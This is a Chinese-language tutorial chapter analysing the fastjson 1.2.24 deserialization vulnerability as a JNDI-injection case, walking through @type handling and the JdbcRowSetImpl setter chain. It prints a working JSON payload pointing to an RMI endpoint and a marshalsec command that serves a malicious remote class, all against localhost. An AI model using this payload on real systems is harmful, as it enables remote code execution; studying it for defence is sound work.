9.fastjson-1.2.24反序列化漏洞
0x01 前言
前一章简单介绍了jndi注入的知识,这一章主要是分析一下fastjson 1.2.24版本的反序列化漏洞,这个漏洞比较普遍的利用手法就是通过jndi注入的方式实现RCE,所以我觉得是一个挺好的JNDI注入实践案例。
0x02 fastjson反序列化特点
不同于我们之前提到的java反序列化,fastjson的序列化有其自身特点,我们通过一些小demo来展示如何使用fastjson。我们常说的fastjson的序列化就是将java对象转化为json字符串,而反序列化就是将json字符串转化为java对象。
fastjson 序列化demo:
其中User类如下:
运行Test类,就会得到如下json字符串:
fastjson 反序列化demo
fastjson反序列化有个特点,就是会自动调用目标对象的setXXX方法,例如{"name","axin", "age": 18}被反序列化时会自动调用对应对象的setName以及setAge方法,我们用代码实践一下,看看是否的确如此
修改一下User类:
然后新建一个反序列化的类:
运行该类,得到如下结果,说明反序列化的过程中确实调用了setXXX方法:
其实fastjson反序列化是有两个api的,一个是上面demo中用到的parseObject()还有一个是parse()方法,他们的最主要的区别就是前者返回的是JSONObject而后者返回的是实际类型的对象,当在没有对应类的定义的情况下,通常情况下都会使用JSON.parseObject来获取数据。
而且在直接使用JSON.parseObject()方法反序列化json字符串的时候是不会调用对应对象的setXXX方法的,那么怎么才能让直接使用JSON.parseObject()反序列化的对象也调用setXXX方法呢,答案是利用@type属性,来看下对比:
可见加了@type属性就能调用对应对象的setXXX方法,那这个@type属性具体是干嘛的呢?其实从上面的demo应该也能得知一二了,就是指定该json字符串要反序列化到哪个类。这个属性让我们的漏洞利用如鱼得水~
ps: fastjson反序列化默认只能反序列化公共属性,如果想要对应的私有属性也被反序列话,则需要下面这样添加一个Feature.SupportNonPublicField参数:
JSON.parseObject(myJSON, User.class, Feature.SupportNonPublicField);
0x03 fastjson反序列化——JNDI攻击向量
有了上面的知识铺垫,大家应该能够想到怎么利用fastjson的反序列化执行命令了吧?就是利用@type属性以及自动调用setXXX方法,如果我们能够找到一个类,而这个类的某个setXXX方法中通过我们的精心构造能够完成命令执行不就行了嘛~
com.sun.rowset.JdbcRowSetImpl
就是这么一个类,这个类中有两个set方法,分别是setDataSourceName()与setAutoCommit(),我们看一下相关实现:
setDatasourceName
setAutoCommit
这里的setDataSourceName就是设置了dataSourceName,然后在setAutoCommit中进行了connect操作,我们跟进看一下
可以看到这里connect方法中有典型的jndi的lookup方法调用,且参数就是我们在setDataSourceName中设置的dataSourceName。
具体的代码就先不分析了,fastjson反序列化的流程大概就是先进行json数据的解析,我个人认为这个分析是个体力活,一步一步调试就行了,就没必要再写出来了。然后我们现在知道了上面两个setXXX方法有问题,怎么构造poc呢?如下就行:
{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://127.0.0.1:1099/Evil", "autoCommit":true}}
可见dataSourceName的值为我们恶意的rmi对象,之前我们都是自己写代码注册rmi对象的,现在介绍一个线程的部署rmi服务的工具:
https://github.com/mbechler/marshalsec
需要自己用maven工具生成jar包,使用说明中有介绍,我们用该工具快速搭建一个rmi服务器,并把恶意的远程对象注册到上面,使用如下命令:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1:8000/#Evil
其中我们的恶意对象是放在本地的一个运行在8000端口的web服务上的(我们可以用python快速搭建一个web服务器)
弹个计算器
Last updated